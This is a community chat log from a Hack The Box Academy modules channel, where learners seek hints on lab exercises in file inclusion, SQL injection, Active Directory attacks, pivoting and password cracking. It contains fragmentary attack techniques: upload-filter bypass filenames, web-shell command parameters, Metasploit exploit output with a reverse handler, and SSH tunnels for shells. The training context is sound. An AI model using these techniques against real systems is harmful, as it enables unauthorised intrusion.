#modules

1 messages · Page 454 of 1

upbeat whale
#

.

glad lava
#

anyone finished or did the latest file inclusion exerise? how to solve it? the LFI dnt work tho

gray yacht
#

You can DM if you are still stuck on this one.

glad lava
gray yacht
brazen saffron
#

DId you see the directory with ls?

wild temple
#

what are the new codes for hakcs?

#

still figuring out and studying the basic codes

steady forge
#

Does anyone understand this question? I was doing it on the pawnbox and I get a message saying that it can't resolve. Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

autumn pilot
#

Exit the SSH session and try to run your command again

modern spear
#

Hey guys ! Is there anyone fully understand the content of PendingIntents exploit in Android Dynamic Analysis module? If available hope that i can dm.

civic inlet
tranquil wren
#

i found the answer to q1, i am struggling on q2 though have run nxc with various search keywords to no avail, i have also manually searched through the shares i gained access to with the domain user from q1, my only assumption based on inference from ||'Users||' is that i am looking for the password to ||'lab_adm||' which i cannot find with any search. can someone give a me a small nudge?

green musk
#

Someone also facing this problem or it just me as I thought HTB community mods would assist me better in this

green musk
mellow river
green musk
mellow river
green musk
#

What issue you facing?

agile dagger
#

I am stuck on the same question. It seems to have no point which is working. I found some extra parameters but nothing works for gods sakes.

mellow river
# green musk What issue you facing?

I can't find parameter vulnerable to file inclusion...
I have been found one parameter that is reflecting first name from contact form...but I didn't manage to use it for File Inclusion... Also there is an api with few php endpoints, tried to find parameters there but unsuccessfuly..
Lastly, there is one parameter on /api/image.php but it is returning error only

drowsy grove
#

Something wrong with the quiz boxes?

#

it just doesn't seem to work, at first I had || inlanefreight.htb || in my /etc/hosts it didn't work, then I tried getting rid of it, it didn't work

#

it's just broken asf

agile dagger
green musk
drowsy grove
#

this is broken, same results on the attackbox aswell

sacred rock
devout lily
#

Followed all the commands in the pinned message, but i get this error

drowsy grove
agile dagger
mellow river
sacred rock
green musk
#

We can get that region parameter using some fuzzing and more fuzzing will get us the desired output

drowsy grove
#

maybe it's just on this one server?

drowsy grove
#

let me try switching regions

sacred rock
drowsy grove
#

yeah

green musk
# sacred rock Everything is working as intended

Hey man can you please check Attacking Enterprise Network and its sub topic Lateral Movement as my ligolo isn’t working properly and keeps getting me Keepalive and since yesterday that box is being too slow to operate

agile dagger
drowsy grove
#

This is from my kali box

sacred rock
drowsy grove
sacred rock
#

Reset the target and try again

drowsy grove
#

I've been doing that for the past 20 minutes lol, I just switched servers, let me try now

#

yup, switching servers worked

#

Thanks @sacred rock , you're the goat

sacred rock
#

What server were you trying?

drowsy grove
#

US 6

#

now I'm on US 4, you should checkout 6

brazen saffron
outer inlet
sacred rock
flat oasis
#

https://academy.hackthebox.com/module/77/section/854 I am following the "nibble attacking the first box" on my penetration tester learning path. The last part requires me to use msfconsole to hack into the machine with nibble blog file upload vulnerability. It worked for the manual method, but it fails in the metasploit with the error, msf exploit(multi/http/nibbleblog_file_upload) > exploit
[-] Exploit failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
[*] Exploit completed, but no session was created.

heavy spoke
#

Hi, anyone on Skills Assessment II NoSQL ?

flat oasis
#

please help me guys

sand valve
#

Also why i can't chat in #general can anyone tell me ?

flat oasis
#

I am on the penetration tester learning path

#

And it's the nibble box.

#

I have provided the rest of details.

sand valve
#

Oh , sorry i don't know much on that but have you tried asking help on the help chatbox on htb site on the bottom right corner ?

flat oasis
#

That's doesn't help

#

Its just bogus

quick stump
#

Hello

#

I’m new here

fallow gazelle
#

Hey guys, i'm trying to use rsync and crontab to backup a folder to my local machine using the 127.0.0.1 loopback address, how do i do this? I keep getting a cron install error

#

I created two folders on my desktop:
•Source Folder
•Backup Folder

and a bash script called RSYNC_Backup.sh

#!/bin/bash

rsync -avz -e ssh path/to/source username@127.0.0.1:/path/to/backup

#

Generated an ssh keypair aswell. But my crontab keeps failing to install which is:

celest linden
#

Yooo some active people

fallow gazelle
#

***** /home/user/Desktop/RSYNC_Backup.sh

celest linden
#

Finally

celest linden
fallow gazelle
#

No

#

Yo guys, if anyone can help me with that please

celest linden
#

Wts this server and anyways

fallow gazelle
#

It will be helpful

#

I need help with the Linux Fundamentals module

toxic canyon
#

👋 Hello

agile dagger
#

Hey anyone any luck with Flie inclusion skill assesment

fathom berry
#

Hi everyone, just logged into my account and I see that a previously completed module has reset itself. What do?

edit: I think it was once called Web Fuzzing with ffuf, or something to that extent. Now its just Web Fuzzing
edit 2: I see a change has been announced in the academy-announcements channel. Anyone with similar issues, look there.

wet glen
#

Hi, i'm doing "Model Deployment Tampering" of "Attacking AI - Application and System ", and even following the exact steps showed in the lesson, the mcp target gives me always the same results:

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}

I also don't get how to use reverse shell starting from forwarded ports:

ssh htb-stdnt@<SERVER_IP> -p <PORT> -R 8000:127.0.0.1:8000 -L 8081:127.0.0.1:8081 -N

And finally even the msfconsole exploit fails with:

[*] Started reverse TCP handler on IP:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
[*] Using URL: http://IP:8080/HSyoCR6tWi7JJhR/
[*] Registering the model archive...
[*] Server stopped.
[*] Exploit completed, but no session was created.

Can anyone suggest me how to move ? I think i'm not getting it right.

young zephyr
#

I want upload.php and thats what I am requesting

heavy spoke
agile dagger
#

If I can see the shell getting injection in the nginx log but when i am trying to run &cmd=pwd but nothing is getting returned

bleak mural
#

Hello world

sweet escarp
fallow gazelle
#

Is anyone able to help me with the Linux Fundamentals module?

placid edge
#

Question: Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt

DC01 winrm is filtered is says when running a nmap scan on the ports. Dont know if there is something im missing here, but looking at the answer it doesnt seem so. Can anyone else verify if they are having issues as well?

This is for Windows Remote Management (WinRM) on Windows Lateral Movement

dusky wedge
#

Linux Fundamental on task scheduling moduleThe question ask What is the Type of the service of the "dconf.service".
I did research on the types of services that run on linux.
My conclusion was it is a "User service" but its not the correct answer can anyone assist me.

dusky wedge
fallow gazelle
#

Where you make a local folder called to_backup and synced_backup

dusky wedge
fallow gazelle
#

Of services or something, then tried each one

#

Maybe there is a command for it however

#

Do u want the answer?

dusky wedge
fallow gazelle
#

how are u approaching it?

#

I probably should have looked for a command that tells the type of the service 🤔

gray yacht
dusky wedge
placid edge
#

forgot i needed to proxy thru the machine and not just be satisfied with a regular tun interface @gray yacht

fallow gazelle
#

Doesn't work for me

heady pilot
#

hello

keen oxide
sand rose
#

Hello all. I hope you are well. I'm currently doing the Dynamic Port Forwarding with SSH and Socks Tunneling section in the Pivoting, Tunneling, and Port Forwarding module. Its asking me to connect to 172.16.5.19 using Dynamic Port Forwarding... except when I run "proxychains4 nmap -sn -v 172.16.5.0-200", there are some hosts that are up, and some that are down... but the IP Address 172.16.5.19 is showing as down in that list... but thats the ip it wants me to use to rdp. I reset the target 2 times... am I missing something?

cloud urchin
hybrid temple
#

Hi, I have to contradict you. It ALSO works on KALI!

agile dagger
#

Hi, asking again if someone solved the file inclusion skill check?

cloud urchin
#

Many people have

#

best to just ask your question

agile dagger
#

I don't know if many have solved the latest one

#

The latest one is not the inlanefreight, it's something different.

compact grove
#

Hi all, for the Active Directory Enumeration and Attacks module, Im given a network of 172.16.5.0/23, but im not able to get anything to answer fping or nmap requests in that range. It says all 510 hosts unreachable

austere sinew
#

Yo

sand rose
quasi wave
#

hi so for the ACL Abuse Tactics section of AD Enumeration and Attacks module, I am following the instructions as specified in the one question of the section but its denying me access when I try to change the password for the user. Can someone help me with this? I would post my output but it would probably spoil stuff.

storm perch
#

he guys

civic inlet
civic inlet
quasi wave
quasi wave
#

if anyone sees this later today, let me know if you are available for a DM tonight please. thanks

maiden swan
#

Hi i need help can me Text somebody

#

Maybe german

tender nimbus
#

Hey guys quick question about local port forwarding, what is the utility of it I mean if ssh to a compromise host and he is running mysql localy for example, I can access it since i'm on the machine so what is the utility after it to do a local port forwarding on this service?

prime mirage
tender nimbus
prime mirage
#

It is just one example you find many more

#

Yeah, but the idea is exposing an internal port to outside

#

That is why is called forwarding, it is not just useful for hacking

tender nimbus
#

okej I get it, it don't have to specially run on localhost right? Like imagine I want to ssh on my internal network from an other country I use then port forwarding from my router?

sand rose
storm perch
#

Hello everyone

storm perch
#

I would like to learn how to hack

prime mirage
storm perch
#

how do i get into the general chat???

prime mirage
prime mirage
tender nimbus
# prime mirage I am trying to understand what do you really wanted to say

Hahah what I mean is from the example I have here on the module is that we do a localport forwarding from the host (3306 running locally) to our attacking machine. We use ssh for it. So I in my head it was like "okej but if we can ssh to it we can access it internally so what is the purpose of it?" and you awnsered "What if the machine doesn't have mysql client installed, only server?" so I now understand that we do that to use our tools (from our attacker host) on the host we compromised. My next question was "does it have to be a service running on localhost to be able to do local portforwading, or is it the same as doing a localport forwarding from my router (idk port 4444) to my personal pc (22) to be able to connect to my pc (so on my internal network of home) from another place (like another country)?

sand rose
tender nimbus
sand rose
#

i let echoes answer since he started typing. Im 90 percent I know the answer, but I'd rather let him answer so I don't say something incorrectly

prime mirage
sand rose
prime mirage
#

But the concept is the same as what it concerns to the way you're telling the machine to forward or bind the port

prime mirage
prime mirage
sand rose
#

Kk. Im looking at a module right now, where I got that from. I'm just simply noting that the module was talking about executing a local port forwarding. Based on your responses, sounds like the same thing with different names.

prime mirage
#

Dang I type bad xd

prime mirage
#

But you can also forward your own port from your machine

sand rose
#

Gotcha. That makes sense.

prime mirage
#

I'm glad I could help

prime mirage
sand rose
#

So with the above... when I get a response back, is the remote host sending back over port 3306, and then ssh forwarding it back to me on 1234?

prime mirage
#

Yes

#

I called it port binding I was wrong it is local port forwarding

#

But everything else I think is correct

#

I will check everything tomorrow to be completely sure and if there is something wrong I'll let you know

fallow gazelle
spark cedar
#

hi im new

winter schooner
#

Hello, can i dm anyone for a nudge on the new sql injection fundementals skills assesment.

cloud urchin
spark cedar
#

oh

severe inlet
#

Hello everyone i'm preparing for an exam and i find that my skills on post-exploitation are weak

Any recommended module in HTB that will make me better?

rustic sage
#

W gangf

severe inlet
#

Since the exam will definitely contain an AD Set

#

For me linux was always easier in terms of privesc and Post-Exploitation but windows has alot of complex stuff that i decided after my exam i will try to learn windows as a OS so i can progress after

rustic sage
winter schooner
flat tree
#

Can I hack on a fold

#

I im kinda new

#

I got a frend with some scripts. That can disable a computer

cloud urchin
#

Please read the #rules and follow the instructions in #welcome to get access to more channels. This one is dedicated for discussion of the modules on HTB.

flat tree
#

Huh

#

So can I hack on a zfold

cloud urchin
#

Modules wouldn't be a fun experience on a phone

#

not sure you could run pwnbox via the browser, haven't tried it

flat tree
#

IM NEW WHAT IS PWN

compact patrolBOT
cloud urchin
#

Go through that

flat tree
#

Ok

#

So I get linux?

cloud urchin
# flat tree So I get linux?

This isn't the channel for this kind of discussion, as I said. Follow the instructions in #welcome to link your HTB account to gain access to channels like #general. The link I gave you is how to get started learning.

winter schooner
# cloud urchin Go through that

Hey is there anyone/anyplace i can ask for help on the new skills assessments? I asked in the default channels but nobody answered.

silk lagoon
#

Anyone able to help with nosql injection skills assessment II

cloud urchin
flat tree
#

Ok

#

OHHHH IM ON THE WRONG CHANEL

#

Sorrry

winter schooner
flat tree
#

It won't let me go in general

cloud urchin
cloud urchin
winter schooner
#

Can anyone give me a hint for the new sql injection skills assessment

dense laurel
#

Can anyone help me in sql injection for learning

hallow marten
cloud urchin
silk lagoon
hallow marten
celest linden
cloud urchin
brave field
#

In the Skills Assessment - File Upload Attacks, has anyone done the Extra Exercise? If so, please dm.

runic lance
#

Skills Assessment - SQL Injection Fundamentals it's stuffy. I did the old one without any problems, but I couldn't do the new one.

brave field
cloud urchin
#

lol. bruh you're in the hack the box server. hack the box's academy.

brave field
sinful oak
#

hey everyone, I need a hand with nmap, specifically the service enumeration flag section. I'm not sure how I'm supposed to find which port to Netcat into, and I know darn well that there's gotta be a faster way to find the right port without sifting through a -p- nmap

brave field
fallen trail
#

Hi, I am really struggling with the Skills Assessment - File Inclusion assestment. I am basically totally lost at this moment, there is anyone that can help me?

sinful oak
winter smelt
#

cleans up the output a bit 🙂

sinful oak
#

Noted 🤙

uncut quest
#

Hi guys

clever quartz
#

Hi Guys, need help with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows under Active directory enumeration and attack module

Within this section, I am on the Accessing DC03 Using Enter-PSSession subsection.

I don't know how to proceed with this subsection. I don't have the built-in administrator account's password and i was unable to crack it after performing DCSync. Any clue to help.

Below text is from HTB: I am not able to reproduce it

PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL

brave field
foggy flame
#

„Can someone please help me? I'm stuck on the SQL Injection Fundamentals Skills Assessment — nothing seems to work, and I've already tried everything.”

#

I'm still at the login page.

sacred rock
foggy flame
sacred rock
steady forge
agile dagger
#

Just keep adding the number of cols until you get a response

dark jay
#

hello, i am doing hackthebox academy File upload attack module and i am stuck on whitelist filters, can anyone give tips, i found that filename="shell.php..jpg" and shell.php/.jpg is getting uploaded but i cannot even view the web page nor the execute code, please help me i have been stuck for 2 hours on this

storm elk
#

what for @verbal finch

#

this is not a server with hackers for hire

#

if you lost your Google account, this isn't Google

verbal finch
#

Uhh

white temple
#

what questions do you need answered?

storm elk
#

They lost their Google account. This is not Google support

honest lantern
sacred rock
#

You are clearly missing something, test all parameters, hack with a goal

dark jay
#

can anyone give me tip? i found upload vuln but php code does not execute what should i try

nova berry
#

can anyone recommend me course for python scripting , automating or for ctfs ? i am done with basic python .

glad lava
#

u guys how do i fix my lab tho?
Like most of my labs now become 403 error when i access the webpage , da hell?

warped basin
#

Hi everyone, i hope you are having a good day/afternoon. I'm doing the sqli new skill assessment from CWES path, the chattr one. I need some help please!!! T_T

glad lava
#

the instance.

foggy snow
#

Try resetting it I would say, usually fixes about 95% of issues

glad lava
#

hold on let me try , ithink just now cause it requires 5 mins waiting time i forgot about it

foggy snow
#

It is recommended to wait a few mins, usually not required as far as I'm aware

glad lava
#

i will wait a while

#

anymore solutions? i still can't access

glacial gulch
#

Hey guys, im stuck in lfi skill assessment part i cant get rce actually. There is file upload part and i tried to upload a php shell into it but ended up just seeing that php code in response when i was requesting the php file with &cmd=id query parameter. If anyone has completed or could give some hints i would be grateful

sacred rock
glad lava
sacred rock
#

Try https instead of http

glad lava
#

it worked but why tho? it should redirect https itself no?

obtuse bramble
#

Some guid me

sacred rock
flint arch
#

I am stuck on the second question in the password attacks 'Pass the Certificate' section. I've entered DC01 using pywhisker, found the administrator password, and can connect to CA01 as admin, but there is no flag on the CA01 admin’s desktop. It seems I need to get admin permissions for DC01. How can I achieve this?

uneven lava
#

Anyone here I can ask for attacking ai - application and system skill assessment?

glad lava
#

anyone wana give a nudge on the sqli new assessment?

i am halfway tho like i assume is broken or smtg lol?

winter schooner
stable epoch
#

is academy having technical difficulties atm

glacial gulch
# brave field same

this lab is very strange like i cant execute literally anything not even log poisoning allow_url_include is also disabled and no rfi chance i guess because of this

empty imp
#

Module 25, Section 142 (Kerberos attacks - Unconstrained Delegation), I cannot connect via RDP. Seems to be some sort of legacy RDP on the system.

Has anyone succeeded?

I tried playing around with the /sec flags.

gray yacht
empty imp
gray yacht
crisp hornet
#

in the courses for certifications the modules also include labs right? Not just theory

#

meaning, practice + theory

sleek spruce
#

In Password Attacks - Skill Assessment (New), I logged in to ssh, configued chisel and got william pass, can anyone give me a hint to what to do next? I'm struck..

vivid hatch
#

Hey friends

jade frigate
#

Can somebody explain to me why the reverse tcp connection starts then suddenly closes?

(I used a base64 encoded payaload on target script and nc on myhost)

vivid hatch
#

I'm back

sleek spruce
rose lagoon
#

Hello I'm stuck in the skill assessment on the Information Gathering - Web Edition can you help me

rustic sage
#

just press enter on your keyboard or type something and press enter and see if something pops up

rustic sage
rose lagoon
jade frigate
rustic sage
jade frigate
sleek spruce
rose lagoon
rose lagoon
#

I curled and it's working

sleek spruce
#

then try taking Pwnbox

rose lagoon
sleek spruce
#

You need to find vhost first

nocturne wing
#

yo, im stuck at linux priv esc module, 1st challenge environment enumeration

rose lagoon
eager star
#

Hi all

rose lagoon
sleek spruce
rose lagoon
sleek spruce
#

Not yet though

#

You won't get anything

rose lagoon
sleek spruce
#

Use gobuster on the vhost you found

rose lagoon
#

ok thank you for the hint you can delete

#

@sleek spruce I finish it thank you bro

sand valve
fossil knoll
#

I'm asking regarding SQL Injection Fundamentals - Skills Assessment I managed to login but I'm really stuck on further enumeration, cannot get column number.

sleek spruce
haughty ledge
#

What is the name of the hidden "history" file in the htb-user's home directory? ( What is the answer here? )

remote merlin
#

If anyone wants to help me with the flag in the proxy module for the bug bounty hunter path, i would greatly appreciate it. i already got the cookie from the site once, using the fuzzing, but then the flag is a little tricky and wants you to fuzz for users with matching md5 cookie? just a little confused.

median kettle
#

for attacking and enumerating AD, for the bleeding edge vulnerabilities, how are you suppose to get the nopac.py file to run on your attack box? the attack box cant clone the repos and pulling all the files from your host box to the vm is just annoying AF

paper crag
#

Hey did you resolve this? I’m having the same problem

atomic arch
#

Hello all - Question on the network foundations module - Skills Assessment

Can someone explained me why this happens?

when connected throught virtual machine i see :
´´´ Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:41687 0.0.0.0:* -

and in Parrot Terminal I see (which is ok):

Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 htb-a6urfndgqv.htb:http 0.0.0.0:* LISTEN
tcp 0 0 localhost:ipp 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:sunrpc 0.0.0.0:* LISTEN
tcp 0 0 localhost:5901 0.0.0.0:* LISTEN
2316/Xtigervnc
udp 0 0 0.0.0.0:bootpc 0.0.0.0:*
udp 0 0 0.0.0.0:sunrpc 0.0.0.0:*

timid inlet
#

Hi All, I am trying to finish the "Skills Assessment - WordPress" located here https://academy.hackthebox.com/module/17/section/64

I cannot figure out the task "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. "

I believe that CVE 2019-19985 https://www.exploit-db.com/exploits/48698 for the Email Subscribers plugin is the correct one.

Assuming that is the correct CVE, I cannot figure out how to use it to get the flag for the task. I've tried various URLs such as "curl http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/flag.txt" but it just says it doesn't exist.

Spent a lot of time Googling but this is as far as I got. Any help is appreciated.

obtuse verge
#

Hello All, I cannot RDP into the machine in Active Directory Trust Attacks -> Abusing SQL Server Links Module. What can i do?

torn rune
#

Hi everyone,
I'm kinda stuck with the Web Fuzzing - skill assessment since it been changed.
I try all I learned in the module but cannot figure what is the problem.
If anyone who solved this can help, I'll appreciated it.

tender nimbus
#

||/spoiler Hello guys quick question about sock tunneling, I did all the things that the module sais and it works perfectly, i'm just curious about one thing, after doing a dynamic port forwarding on port 1234 and adding a sock4 127.0.0.1 1234 to my /etc/proxychains.config file, when I start an nmap on the target with proxychain it give me no open ports, not even the rdp one it says "filtered" but i can connect to it with proxychains any idea?||

tawny quiver
#

I am having some trouble with the password attacks module, I'm not sure if the right file I need is included in the virutal environment. Would anyone be able to help with this?

tender nimbus
tawny quiver
#

Where would I be able to see the resources for the module? I assumed it was included in the virtual environment

tight kraken
tawny quiver
#

This is the introduction to John the Ripper, it asks me to crack user r0lf's password but I can't seem to find any password file or link to download resources on that section.

sacred rock
tawny quiver
#

Got it, thanks!

foggy monolith
#

Just for fun, I decided to revisit the Intro to Windows Evasion Techniques module and see what would happen if I rewrote the example C# reverse shell from that module in Rust.

Turns out, it works even better — and is MUCH easier to cross-compile.

dusty bison
#

Hello everyone, I need some help with the File Inclusion Skills Assessment module. My basic idea for getting the flag in the root is as follows: the website has an upload form for applications. You can upload a webshell there. On the contact.php page, I found a hidden parameter called ?region=. This is probably used for LFI. The problem is that if the string (whether plain text or URL encoded) contains dots (.) or slashes (/), you get an error message: “region” parameter contains invalid characters. Does anyone have any idea how I can get around using dots and slashes?

terse sedge
#

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

idle shuttle
#

Why not

#

Nothing impossible

foggy monolith
#

Not really; it does teach you a lot of C# concepts, so if you're a fast learner like me, you can pick up those skills on the fly; no prior experience with C# necessary. However, translating the payloads into other programming languages after the fact is always fun regardless.

cloud urchin
#

I've heard from other people that they tried in another language and it didn't work so they had to do it in C#.

idle shuttle
#

I bet a thousand dollars

#

Mil

#

Dollar

#

Yes make

silk lagoon
#

Anyone able to help with nosql injection skills assessment II?

toxic meteor
#

Hey, I need a help in Exploiting Web Vulnerabilities in Thick-Client Applications section in Attacking Common Applications module.

#

I don't know how to solve it

viscid bolt
#

Currently doing Intro to SCCM, anyone have advice for the last question, seems 2 accounts are domain accounts but one you get a ||local admin password not domain||, and the other 2 accounts don't have access to DC

round parrot
#

Spent 3 days trying to upload or execute in memory for the sccm skill assessment 3rd question. But always gets a connection related error during transfer. Am I going down a rabbit hole?

vagrant wraith
#

hey guys when trying to use ligolo to route my targets traffic to my new interface i be getting " Starting tunnel to root@dmz01 (00505694f875)
error: unable to start tunnel: unable to open tun interface 'causalargent' (tun.New device or resource busy)
"

plush flint
#

Heyyy supposed I want to start...
I need an organized path .... Sequential I mean...
Can someone assist me

compact patrolBOT
plush flint
round parrot
glad lava
#

anyone solvd SQLI latest skill assessment? hit me up for real

dense tendon
#

I'm stuck on Skills Assessment - File Inclusion. Scenario:<sumace/>. I think the vulnerability is in thanks.php?n, and on the Apply page, I've uploaded a shell.docx zip file, but I don't understand where it's stored or how to interact with thanks.php?n. Everything I write just displays as text, and I've tried various methods, including creating a server using python3 and applying php filters, but nothing seems to work. Please help me.
https://academy.hackthebox.com/module/23/section/513

stone kettle
#

Hi!
I've received error in this module https://academy.hackthebox.com/module/227/section/2500

Noriben finished job with error. I tried to relunch VM and it didnt help...

Can't insert the screenshot here, error while I tried to terminate Noriben by CTRL+C and error about ProcMon popped up "Unable to open 'Noriben_02_Oct....' for reading"

rain mirage
#

password attack , skill assessment ..

im trying to upload mimikatz.exe to Dc01 so i can access the administrators hash , but i keep running into this error , am i doing anything wrong ?

edgy schooner
edgy schooner
paper vapor
#

Hello, i'm doing the Attacking GraphQL Skills Assessment and i'm a little bit stuck, i have gather all the information and tried SQli without success
If someone can help me pls

glacial gulch
paper vapor
cyan arch
paper vapor
#

ok i see thx

foggy monolith
brave field
#

Anyone who was able to get RCE on the updated File Inclusion - Skills Assessment please dm me. Thanks a lot!

gray yacht
gray yacht
viscid girder
#

Hello guys.
I’m learning Android hacking with Hack The Box Module “Android Application Dynamic Analysis”.

I’m getting errors when I want to resolve the task of “Hooking Java Methods”. Frida always says on my laptop : “Failed to spawn: agent connection closed unexpectedly”.

Please, can someone help ???

I’m using Macbook M1 and I use the process in the module.

Thanks in advance.

viscid girder
dusty bison
crystal cove
#

Hi, in the "Hunting Evil with Sigma (Splunk Edition)" module, i'm unable to rdp to the host, the Splunk webserver on the server works but not the rdp part of it (and i cant have two servers online at the same time)

#

is there another solution ?

viscid girder
tight kraken
# crystal cove Hi, in the "Hunting Evil with Sigma (Splunk Edition)" module, i'm unable to rdp ...

The sigma rules and config files are hosted on the previous section's target. One approach would be work on the problem sequentially, copying the results on the previous target, pasting into your note-taking app of choice, then copy-pasting into the new target's splunk instance.

A more general tip (not necessarily what I would do in this case) is that you can transfer files to and from Pwnbox, which persists across sections.

toxic meteor
#

hey, I need a help ,I'm stuck all the day in "Exploiting Web Vulnerabilities in Thick-Client Applications" section in "Attacking Common Applications " module. can you give me the response because I don't know how to find it even I do all steps.

humble ginkgo
#

Chat gpt know this server

#

He made me join him

#

Just jocking

viscid bolt
cloud urchin
#

@humble ginkgo Hi, welcome. Please read the #rules and follow the instructions in #welcome to get access to other channels for general discussion. This channel is dedicated for chat about the modules on Academy.

naive parrot
brazen saffron
#

Did you try to crack it?

naive parrot
#

the hash yeah

gray yacht
naive parrot
#

not sure if the type was right tho

#

hashid wasn't giving me anything

#

I was using RAKP for the hash type but john wasn't giving me anything

solar grove
#

Introduction to Windows Evasion Techniques
Page 3
Static Analysis

I can't log into the box — why does it say the password is incorrect?

xfreerdp /v:10.129.217.111 /u:Administrator /p:'Eva$i0n!' /dynamic-resolution /drive:SharedDrive,.
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - CN = EVASION-TARGET
[10:27:32:139] [32629:32630] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

grand pivot
#

Module: Wi-Fi Penetration Testing Basics
Section: Wi-Fi Penetration Testing Basics - Skills Assessment
Question: What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5?

As shown in the module, I am using the following command to capture the four-way handshake.

sudo airodump-ng wlan0mon -w HTB -c 1

But when I use aircrack-ng to crack the password with a wordlist, I get the followign error message:

Packets contained no EAPOL data; unable to process this AP.

I've deauthed the connected client so that it would attempt to reconnect and I've let airodump-ng run for over 10 minutes. Does anyone know why the client is not doing the handshake?

solar grove
#

"I can't connect to EVASION-DEV even though I'm using the correct credentials.
Introduction to Windows Evasion Techniques"

tight kraken
# solar grove Introduction to Windows Evasion Techniques Page 3 Static Analysis I can't lo...

The lab VMs work a little different in this module compared to most. Those credentials are for the EVASION-DEV machine which you spawn from the Introduction section (page 1). The DEV machine doesn't stay active, simultaneously with the targets you spawn on other pages/sections.

Personally, I found it more convenient to set up my own dev environment on my own local machine and use the VPN option to connect to the lab for this module. You could feasibly switch back and forth between the sections though, if you're not as error-prone as I was!

solar grove
gray yacht
solar grove
gray yacht
inner rivet
#

Having a problem with Windows Attack and Defense -Kerberoasting kali ssh instructions.
The Overview and Lab Environment section gives an ip or (depending on the section) but no kali information on the question. Can't get any of the ips to work.

cloud urchin
inner rivet
quick granite
#

Anyone willing to help trying to crack a RIPEMD-128 hash? It won't work for me, I don't think I am doing anything wrong am I?

quick granite
#

Nope... I went through the history and used the --show, but nothing...

gray yacht
# quick granite Nope... I went through the history and used the --show, but nothing...

If you didn't crack it show won't show it. To view the cracked password associated with that hash type you would need to include the format, like this for example:

└─$ john --format=ripemd-128 ripe.hash --show                                     
REDACTED

1 password hash cracked, 0 left```

You could always look at the content of the `john.pot` file if you wanted to look at all of the hashes cracked by JTR.
quick granite
#

ILY prayge

#

Thanks man!

gray yacht
quick granite
#

I'll do that, thank you!

tight kraken
# solar grove Do you mean I should connect to the machine in section 1 and then not shut it do...

If I recall correctly, the dev machine should stay up until you spin up a different machine in a different section. So if you intend to use only the machines provided and work through the material in order, you'll have to switch back and forth between sections to work on the dev machine, then your current target, then back to section 1 to spin up the dev again, and so on as you progress through the module.

There are many other modules which allow you to launch multiple machines from one section so you can seemlessly hop between multiple hosts as you work, which is very convenient, but this isn't how the Windows Evasion module is set up unfortunately.

solar grove
#

Antivirus
[10/03/2025 10:21:06] Checking...
[10/03/2025 10:21:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
[10/03/2025 10:22:06] Checking...
[10/03/2025 10:22:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
[10/03/2025 10:23:06] Checking...
[10/03/2025 10:23:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus

Microsoft Defender can't detect it, but flag.txt is not being created.

dusty bison
#

As an alternative u can also try to use hcxdumptool instead of airodump-ng and and aireplay-ng

steep zinc
#

Issues with NTLM Relay Attacks assessment, I have created a fake computer and am running the relay for ADCS, and when I run the printerbug.py. It keeps telling me that the object doesn’t exist?

grand pivot
dusty bison
dusty bison
stuck hollow
#

module Web Fuzzing section Virtual Host and Subdomain Fuzzing
on gobuster subdomain fuzzing, parameter for dns is -do and not -d

indigo sky
# dusty bison Interesting. The application uploads surely end up in the directory “http://IP:P...

Yes, that is the parameter for image.php. Regardless, you are right on the contact.php's 'region' parameter, that is in fact vulnerable to LFI, and from which you can trigger an uploaded shell by appending the desired command. I have done this process, and I got the " 'region' parameter contains invalid character(s) ", and after retrying it a couple times, I ended up looking at the solution, to really see if I was doing something wrong, but I did it exactly as it is contemplated. I am starting to think that there is something messed up within the skill assessment, otherwise if someone knows what could be happening, we would appreciate some help!

paper nebula
#

